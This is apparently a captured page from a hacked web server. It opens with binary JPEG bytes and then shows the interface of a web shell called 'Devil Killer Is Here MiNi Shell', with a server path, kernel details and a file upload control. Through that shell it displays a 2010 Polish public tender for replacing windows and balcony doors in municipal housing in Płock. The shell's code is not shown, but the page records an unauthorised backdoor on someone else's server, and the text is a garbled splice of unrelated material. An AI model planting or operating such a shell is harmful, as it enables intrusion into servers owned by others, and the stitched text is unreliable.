JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100720/193241-N-2010.html

<p class="kh_header"><b>Płock: Wymiana stolarki okiennej  i drzwi  balkonowych w budynkach mieszkalnych gminnych administrowanych przez MZGM - TBS sp. z o.o. w Płocku</b><br>
<b>Numer ogłoszenia: 193241 - 2010; data zamieszczenia: 20.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 024 3640310, faks 024 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością ze 100% udziałem Gminy Miasto Płock.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej  i drzwi  balkonowych w budynkach mieszkalnych gminnych administrowanych przez MZGM - TBS sp. z o.o. w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i montażem nawiewników (zgodnie z protokołami typowania) w budynkach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują Rejony Obsługi Mieszkańców administrujące budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.

Ilość stolarki okiennej i drzwi balkonowych do wymiany z podziałem na Rejony Obsługi Mieszkańców zwanych dalej  ROM:
1. Część I (ROM III) 	-   32 okien  i 1 drzwi balkonowe;                                                           
2. Część II (ROM IV -  A) 	-   68 okien  i 16 drzwi balkonowych ( W części tej wystepuje lokal  użytkowy zgodnie z protokołem typowania nr 93)
3. Część III (ROM IV - B)	-   94 okna  i 18 drzwi balkonowych;
4. Część IV (ROM IV - C)	-   86 okien  i 20 drzwi balkonowych;
5. Część V (ROM IV -   D)	-   83 okna  i 10 drzwi balkonowych; 
6. Część VI (ROM V)	-   40 okien  i 3 drzwi balkonowe;
Łącznie 403 okien i 68 drzwi balkonowych.
Wyrób powinien być dopuszczony do obrotu w budownictwie (profil oraz wszystkie elementy składowe).
Stolarkę należy wykonać z wysokoudarowego, wzmocnionego PCV, ostatecznie wykończoną w kolorze białym. Profil okien 5-cio komorowy, niepocieniony, okucia obwiedniowe, spełniające wymagania Polskich Norm i aprobat z możliwością mikrowentylacji przy zamkniętym skrzydle. Grubość skrzydła min. 70 mm, wzmocnienia stalowe o grubości min. 1,5 mm o przekroju ceowym, grubość ramy min. 70 mm, wzmocnienie ramy stalowe o grubości min. 1,5 mm o przekroju prostokątnym. Stolarka powinna posiadać współczynnik infiltracji powietrza a=0,5-1,0 oraz być wyposażona w uszczelki przylgowe typ EPD 11, równoważne lub wyższej klasy, na całym obwodzie okna odpowiadające normom Producenta. Okna powinny posiadać szyby zespolone o współczynniku min.U=1,1 W/m2K. Część stolarki musi mieć górną ościeżnicę okien i drzwi  balkonowych szerokości 15 cm, zgodnie z zapisami w protokołach typowania.
Stolarka okienna musi posiadać geometrię i sposób otwierania z zachowaniem istniejącego podziału.
Szczegółowy zakres robót oraz schematy stolarki określają załączniki: Protokóły typowania robót o numerach od 142do 155 -załącznik Nr 4 - Część I (ROM III), Protokóły typowania robót o numerach od 91 do 96 -załącznik Nr 4a - Część II (ROM IV - A) Protokóły typowania robót o numerach od 97 do 102-załącznik Nr 4b - Część III (ROM IV - B ), Protokóły typowania robót o numerach od 103 do 107. -załącznik Nr 4c - Część IV (ROM IV - C), Protokóły typowania robót o numerach od 108 do 141 -załącznik Nr 4d - Część V (ROM IV - D), Protokóły typowania robót o numerach od 156 do 168 -załącznik Nr 4e - Część VI (ROM V)  do SIWZ i Przedmiar robót Część I(ROM III)- załącznik Nr 5, Przedmiar robót Część II(ROM IV - A)- załącznik Nr 5a, Przedmiar robót Część III (ROM IV - B)załącznik Nr 5b, Przedmiar robót Część IV(ROM IV - C) załącznik Nr 5c,  Przedmiar robót Część V(ROM IV - D) załącznik Nr 5d,   Przedmiar robót Część VI (ROM V) załącznik Nr 5e  do SIWZ oraz Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część I(ROM III)załącznik Nr 6, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część II (ROM IV - A) załącznik Nr 6a, Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część III (ROM IV - B) załącznik nr 6b, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część IV (ROM IV - C) załącznik nr 6c, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część V (ROM IV - D) załącznik nr 6d, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część VI (ROM V) załącznik nr 6e, stanowiące integralną część opisu przedmiotu zamówienia.
Do zakresu robót należą następujące czynności:
- demontaż starych okien i drzwi balkonowych (w części drzwi balkonowych konieczny demontaż balustrad balkonowych),
- montaż nowej stolarki PCV,
- montaż zdemontowanych balustrad balkonowych;
- demontaż istniejących podokienników,
- montaż nowych podokienników z blachy ocynkowanej stalowej,
- montaż parapetów wewnętrznych wg protokołów typowań,
- montaż nawiewników wg protokołów typowań,
- uzupełnienie tynków zwykłych kategorii III w ościeżach,
- dwukrotne malowanie farbą emulsyjną tynków w ościeżach.
Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych robót i środowisko.
Wykonawca jest zobowiązany usuwać na bieżąco, na własny koszt, wszelkie uszkodzenia i zanieczyszczenia spowodowane przez jego pojazdy na drogach publicznych dojazdach do miejsc wymiany stolarki oraz usuwać na bieżąco elementy pochodzące z rozbiórki.
Wykonawca zobowiązany jest do uzgodnienia terminu wykonania robót z lokatorami. Zamawiający w tym celu przekaże Wykonawcy dokument  upoważniający do powyższych czynności.
Powyższe postępowanie dotyczy każdej Części zamówienia. Na każdą Część zamówienia z Wykonawcą zostanie zawarta odrębna umowa.
Uwaga:
Na proponowaną w ofercie stolarkę wymagane są certyfikaty, atesty oraz Aprobata Techniczna (nie sam aneks do aprobaty) załączona do oferty oraz Deklaracja zgodności wystawiona przez producenta przedłożona przed odbiorem robót.
Na całość wykonanych prac wymaga się minimum 60 - miesięcznej  gwarancji producenta..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca Przystępując do  przetargu jest zobowiązany wnieść wadium w wysokości:
na Część I dla (ROM III ) 	-     500,00 złotych (słownie: pięćset  złotych)
na Część II dla (ROM IV - A) - 1.500.00 złotych (słownie: tysiąc pięćset złotych)
na Część III dla (ROM IV - B) - 1.500.00 złotych (słownie: tysiąc pięćset złotych)
na Część IV dla (ROM IV - C) - 1.500.00 złotych (słownie: tysiąc pięćset złotych)
na Część V dla (ROM IV -  D)  - 1.500.00 złotych (słownie: tysiąc pięćset złotych)
na Część VI dla (ROM V)	-    500,00 złotych (słownie: pięćset  złotych)
Łącznie wadium dla wszystkich części zamówienia 7.000,00 zł (siedem tysięcy złotych )
2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz U. Nr 109, poz.
 1158 z późn. zm.).
4. Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy MZGM - TBS  sp. z o.o. w Banku PKO Bank Polski S.A. 2 Oddział w Płocku Nr konta: 30 1020 3974 0000 5402 0098 2272
Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdują się na koncie Zamawiającego w terminie /godzina / składania ofert.
5. Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia zostanie wykluczony z przedmiotowego postępowania na podstawie art. 24 ust. 2 pkt. 2 ustawy Prawo zamówień publicznych. 
6. Dowód wniesienia wadium w formie innej niż pieniężna należy załączyć do oferty w formie oryginału.
7. Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.11
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy  w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
9. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 7 jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 
ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia w trybie art.44 w związku z art.22 ust.1 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)wykonali w ciągu ostatnich pięciu latach (przed upływem terminu składania ofert ), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną robotę budowlaną (na każdą Część zamówienia oddzielnie) odpowiadającą swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia w ramach Części , tj. wymianę stolarki okiennej oraz o wartości co najmniej na każdą Część zamówienia jak niżej:
Częśc I	-	20.000,00  zł (słownie: dwadzieścia tysięcy złotych)
Część II	-	40.000,00  zł (słownie: czterdzieści tysięcy złotych)
Część III	-	40.000,00  zł (słownie: czterdzieści tysięcy złotych)
Cześć IV	-	40.000,00  zł (słownie: czterdzieści tysięcy złotych)
Część V	-	40.000,00  zł (słownie: czterdzieści tysięcy złotych)
Część VI	-	20.000,00  zł (słownie: dwadzieścia tysięcy złotych)
wraz z załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia,nie spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia w trybie art.44 w związku z art.22 ust.1 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) dysponują co najmniej jednym kierownikiem robót posiadającym uprawnienia budowlane i wpisanym na listę członków Okręgowej Izby Inżynierów Budownictwa. (Wykonawca składając ofertę na jedną lub więcej Części zamówienia powinien dysponować co najmniej jednym kierownikiem robót  posiadającym uprawnienia budowlane i wpisanym na listę członków Okręgowej Izby Inżynierów Budownictwa).
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia,nie spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia w trybie art.44 w związku z art.22 ust.1 Ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)Certyfikaty, Atesty - dla szyb zespolonych, okuć drzwi balkonowych i okien, kształtowników dla proponowanej stolarki okiennej oraz Aprobata Techniczna na proponowaną w ofercie stolarkę (nie sam  aneks do aprobaty)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-  Kopia uprawnień budowlanych kierownika robót.
- Kopia aktualnego zaświadczenia o członkostwie w Okręgowej Izbie Inżynierów Budownictwa kierownika robót</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo do wprowadzenia zamiennych protokółów (zmiana lokalizacji wymiany stolarki) typowania z uwagi na możliowść wystąpienia nieprzewidzianych zdarzeń i okoliczności nie powodujących zmiany wynagrodzenia. 
 Zamawiający pisemnie zawiadomi Wykonawcę z  7 dniowym wyprzedzeniem o powyższych zmianach .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o 09-400 Płock ul. Polna 7 p. 32 w godz. 07:30 - 15:30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2010 godzina 09:30, miejsce: Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o 09-400 Płock ul. Polna 7 Kancelaria p. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ROM III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i montażem nawiewników (zgodnie z protokołami typowania) w budynkach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują Rejony Obsługi Mieszkańców administrujące budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.Część I (ROM III) -   32 okien  i 1 drzwi balkonowe;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ROM IV A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i montażem nawiewników (zgodnie z protokołami typowania) w budynkach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują Rejony Obsługi Mieszkańców administrujące budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.Część II (ROM IV -  A) -   68 okien  i 16 drzwi balkonowych ( W części tej wystepuje lokal użytkowy zgodnie z protokołem typowania nr 93).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</p></li>
